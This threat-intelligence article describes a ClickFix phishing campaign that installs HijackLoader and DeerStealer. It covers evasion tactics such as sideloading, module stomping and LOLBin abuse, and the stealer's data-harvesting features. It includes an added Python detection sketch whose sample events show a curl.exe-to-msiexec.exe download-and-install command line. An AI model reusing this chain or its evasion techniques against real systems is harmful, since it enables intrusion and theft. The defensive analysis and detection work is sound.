Recently, eSentire’s Threat Response Unit (TRU) uncovered an alarming surge in campaigns leveraging a malware duo: HijackLoader and DeerStealer. What started with a simple phishing redirect has now evolved into a stealthy, multi-stage infection chain capable of bypassing defenses and exfiltrating a range of personal and enterprise data.
The initial compromise begins with ClickFix, a deceptively simple social engineering trick. Victims are lured to phishing pages that prompt them to copy and paste a malicious command into the Windows Run prompt — a form of malware delivery that bypasses traditional defenses like email filtering and sandboxing.

This command downloads a malicious MSI file (now.msi) with curl.exe and then executes it with msiexec.exe. Under the hood, the MSI abuses a legitimate COMODO binary (EngineX_Co64.exe) to sideload a malicious cmdres.dll, hijacking the DLL loading process.
“Though this file isn’t malicious by itself… it is seen instead loading an unsigned version of cmdres.dll,” the researchers explain.
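The delivery chain above leaves two distinctive traces in endpoint telemetry: curl.exe writing an .msi that msiexec.exe then installs, and the COMODO host binary loading an unsigned cmdres.dll. The following detection sketch is an added example, not code from eSentire or the report; the event layout (Sysmon-like process-creation and image-load records), the explorer.exe parent, the file paths and the download URL are constructed assumptions.

```python
"""Toy detection for the ClickFix -> curl.exe -> msiexec.exe chain and the
EngineX_Co64.exe / cmdres.dll sideload. Added example with constructed events;
the field layout and paths are assumptions, not data from the report."""
import re

# Constructed sample telemetry (not real events). A Run-prompt command is
# assumed to show explorer.exe as the parent; the URL is a placeholder.
EVENTS = [
    {"type": "process", "parent": "explorer.exe", "image": "curl.exe",
     "cmdline": 'curl.exe -o C:\\Users\\Public\\now.msi https://example.invalid/now.msi'},
    {"type": "process", "parent": "explorer.exe", "image": "msiexec.exe",
     "cmdline": "msiexec.exe /i C:\\Users\\Public\\now.msi /qn"},
    {"type": "imageload", "image": "EngineX_Co64.exe",
     "loaded": "C:\\ProgramData\\x\\cmdres.dll", "signed": False},
    {"type": "process", "parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe readme.txt"},
]

# Matches a Windows path ending in .msi inside a command line.
MSI_RE = re.compile(r"([A-Za-z]:\\[^\s\"']+\.msi)", re.IGNORECASE)


def find_msi_paths(cmdline):
    """Return the set of lower-cased .msi paths referenced by a command line."""
    return {m.lower() for m in MSI_RE.findall(cmdline)}


def detect_clickfix_chain(events):
    """Return alerts for (1) curl.exe fetching an MSI that msiexec.exe later
    installs and (2) any process loading an unsigned cmdres.dll."""
    alerts = []
    downloaded = set()  # .msi paths written by curl.exe so far
    for ev in events:
        if ev["type"] == "process":
            img = ev["image"].lower()
            if img == "curl.exe":
                downloaded |= find_msi_paths(ev["cmdline"])
            elif img == "msiexec.exe":
                for path in find_msi_paths(ev["cmdline"]):
                    if path in downloaded:
                        alerts.append(("curl_to_msiexec", path))
        elif ev["type"] == "imageload":
            if ev["loaded"].lower().endswith("\\cmdres.dll") and not ev["signed"]:
                alerts.append(("unsigned_cmdres_sideload", ev["image"]))
    return alerts
```

Correlating on the downloaded file path rather than on curl.exe alone keeps routine, legitimate curl usage out of the alert stream.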
Once inside, HijackLoader takes over. Originally spotted in 2023, it continues to evolve with advanced tactics like:
- Storing encrypted configuration in PNG images via steganography
- Module stomping to inject payloads into signed binaries
- Dynamic API resolution using custom hashing algorithms
HijackLoader decrypts its second stage from files like Bairrout.xd using hardcoded offsets and cryptographic routines. The loader then module stomps input.dll and launches a renamed Q-Dir binary to host the final payload: DeerStealer.
Marketed by a threat actor known as LuciferXfiles on dark-web forums, DeerStealer is sold as part of a malware suite called XFiles Spyware. Subscriptions range from $200 to $3000/month, with higher tiers offering stealth features like:
- Hidden VNC for remote desktop control
- Advanced keylogging, clipper, and browser data harvesting
- AI integration and upcoming macOS support
“Unique jump-tables/simple virtual machines are used to decrypt the C2 URL and strings used throughout and due to control flow obfuscation understanding these virtual machines is made that much more difficult,” the report details.
Its core functionality includes:
- Harvesting data from 800+ browser extensions, desktop wallets, VPNs, gaming clients, email apps, and RDP clients
- Hijacking the clipboard to replace crypto-wallet addresses with attacker-controlled ones
- Deploying a modular File Grabber to exfiltrate sensitive documents based on preset rules
DeerStealer communicates with its C2 via HTTPS, using a proxy system (“Gasket”) to mask true server IPs. Initial check-ins fingerprint the host using Windows install date/time, GUIDs, and CPU name. Encrypted ZIP files are used for data exfiltration.
What makes this campaign especially dangerous is its defense evasion at every step:
- Run Prompt execution bypasses email-based security
- LOLBin (Living Off the Land Binary) abuse with curl.exe and msiexec.exe
- Signed binary sideloading of COMODO’s EngineX_Co64.exe
- Module stomping for stealth execution
- AI-resistant obfuscation that defeats many static analysis engines
Despite the public availability of HijackLoader extractors, threat actors show no signs of adapting, suggesting either negligence or confidence in remaining undetected.